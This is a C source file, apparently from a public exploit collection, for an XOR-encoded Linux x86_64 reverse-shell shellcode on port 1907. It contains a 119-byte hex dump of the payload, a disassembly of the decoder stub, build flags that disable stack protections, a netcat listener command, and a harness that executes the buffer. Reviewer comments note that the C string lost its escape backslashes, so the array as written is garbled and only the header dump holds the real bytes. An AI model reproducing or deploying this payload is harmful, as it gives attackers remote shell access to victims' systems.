/*
reverse shell tcp (1907) port shellcode C language - Linux/x86_64

Author : Kagan Capar
contact: kagancapar@gmail.com
shellcode len : 119 bytes
compilation: gcc -fno-stack-protector -z execstack reverse-shell.c -o reverse-shell

Test:
run your machine: nc -vlp 1907
and run exploit (./reverse-shell)
check shellcode raw and test ls, who, pwd command.


<shellproccod>: 0x48 0x31 0xc9 0x48 0x81 0xe9 0xf6 0xff
<shellproccod+8>: 0xff 0xff 0x48 0x8d 0x05 0xef 0xff 0xff
<shellproccod+16>: 0xff 0x48 0xbb 0xdf 0x4b 0x06 0xb1 0x71
<shellproccod+24>: 0x71 0x46 0x28 0x48 0x31 0x58 0x27 0x48
<shellproccod+32>: 0x2d 0xf8 0xff 0xff 0xff 0xe2 0xf4 0xb5
<shellproccod+40>: 0x62 0x5e 0x28 0x1b 0x73 0x19 0x42 0xde
<shellproccod+48>: 0x15 0x09 0xb4 0x39 0xe6 0x0e 0x91 0xdd
<shellproccod+56>: 0x4b 0x01 0xc2 0x0e 0x71 0x46 0x29 0x8e
<shellproccod+64>: 0x03 0x8f 0x57 0x1b 0x61 0x1c 0x42 0xf5
<shellproccod+72>: 0x13 0x09 0xb4 0x1b 0x72 0x18 0x60 0x20
<shellproccod+80>: 0x85 0x6c 0x90 0x29 0x7e 0x43 0x5d 0x29
<shellproccod+88>: 0x21 0x3d 0xe9 0xe8 0x39 0xfd 0x07 0xbd
<shellproccod+96>: 0x22 0x68 0x9e 0x02 0x19 0x46 0x7b 0x97
<shellproccod+104>: 0xc2 0xe1 0xe3 0x26 0x39 0xcf 0xce 0xd0
<shellproccod+112>: 0x4e 0x06 0xb1 0x71 0x71 0x46 0x28


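assembly code is below (AT&T syntax, disassembled from the 119 bytes above).

Only the first seven instructions, up to and including `loop`, are real code.
They form a 39-byte XOR decoder stub: %rcx is set to 10, %rax to the start of
shellproccod, and each pass XORs the 8-byte word at 0x27(%rax) (shellproccod+39
on the first pass) with the key in %rbx, then advances %rax by 8. That covers
10 * 8 = 80 bytes, i.e. offsets 39-118.

Everything listed after `loop` is the disassembler reading those 80 bytes while
they are still XOR-encoded, so the mnemonics there (including `(bad)`) are not
the instructions that execute once the stub has run.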

xor %rcx,%rcx
sub $0xfffffffffffffff6,%rcx
lea -0x11(%rip),%rax # 0x555555558060 <shellproccod>
movabs $0x28467171b1064bdf,%rbx
xor %rbx,0x27(%rax)
sub $0xfffffffffffffff8,%rax
loop 0x55555555807b <shellproccod+27>
mov $0x62,%ch
pop %rsi
sub %bl,(%rbx)
jae 0x5555555580a7 <shellproccod+71>
rex.X ficoms -0x19c64bf7(%rip) # 0x55553b8f349e
xchg %eax,%ecx
fisttpll 0x1(%rbx)
retq $0x710e
rex.RX sub %r9d,0x1b578f03(%rsi)
(bad)
sbb $0x42,%al
cmc
adc (%rcx),%ecx
mov $0x1b,%ah
jb 0x5555555580c6 <shellproccod+102>
and %al,0x7e29906c(%rbp)
rex.XB pop %r13
sub %esp,(%rcx)
cmp $0xfd39e8e9,%eax
mov $0x29e6822,%ebp
sbb %eax,0x7b(%rsi)
xchg %eax,%edi
retq $0xe3e1
es cmp %ecx,%edi
rorb 0x6(%rsi)
mov $0x71,%cl
jno 0x55555555811c
sub %al,(%rax)


*/

#include <stdio.h>
#include <string.h>

/*
 * Payload buffer that main() measures with strlen() and then calls through a
 * function pointer.
 *
 * NOTE(review): as rendered on this page the string holds sequences such as
 * "x48x31" with no backslash before each "x", so a compiler sees plain ASCII
 * text here, not the 119 bytes listed in the header comment's dump. The
 * escape backslashes appear to have been lost when the page was extracted;
 * the header dump is the byte listing to rely on when analysing this sample.
 *
 * Layout according to that dump and the disassembly next to it:
 *   offsets   0-38   unencoded XOR decoder stub; the 8-byte key is the
 *                    movabs immediate at offsets 19-26
 *   offsets  39-118  ten 8-byte words that stay XOR-encoded until the stub
 *                    has run
 * Only the stub is present in plaintext, so it is the part a byte-pattern
 * detection can match without decoding anything.
 *
 * The array is not const, and the stub rewrites offsets 39-118 in place
 * (xor %rbx,0x27(%rax)), so this code needs memory that is both writable and
 * executable.
 */
unsigned char shellproccod[] =
"x48x31xc9x48x81xe9xf6xffxffxffx48x8dx05xefxff"
"xffxffx48xbbxdfx4bx06xb1x71x71x46x28x48x31x58"
"x27x48x2dxf8xffxffxffxe2xf4xb5x62x5ex28x1bx73"
"x19x42xdex15x09xb4x39xe6x0ex91xddx4bx01xc2x0e"
"x71x46x29x8ex03x8fx57x1bx61x1cx42xf5x13x09xb4"
"x1bx72x18x60x20x85x6cx90x29x7ex43x5dx29x21x3d"
"xe9xe8x39xfdx07xbdx22x68x9ex02x19x46x7bx97xc2"
"xe1xe3x26x39xcfxcexd0x4ex06xb1x71x71x46x28";

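/*
 * Test harness: prints the length of the shellproccod buffer, then transfers
 * control to it by calling the buffer through a function pointer.
 *
 * The call can only run the buffer when the memory holding shellproccod is
 * executable, which is why the build line in the header comment asks for
 * -z execstack. Where NX / W^X is enforced on that memory the call faults
 * instead.
 *
 * Returns 0 if the call through the pointer ever returns.
 */
int main(void)
{
    /*
     * strlen() stops at the first zero byte, so the value printed is the
     * buffer length only while the buffer contains no 0x00. It returns
     * size_t, which must be printed with %zu; %d is undefined behaviour
     * wherever size_t and int differ in width (as on x86_64). The cast
     * avoids passing unsigned char * where const char * is expected.
     */
    printf("Shellcode len: %zu ", strlen((const char *)shellproccod));

    /*
     * Object-to-function pointer conversion is not defined by ISO C; it is
     * relied on here as a compiler extension.
     */
    int (*ret)() = (int(*)())shellproccod;

    ret();

    return 0;
}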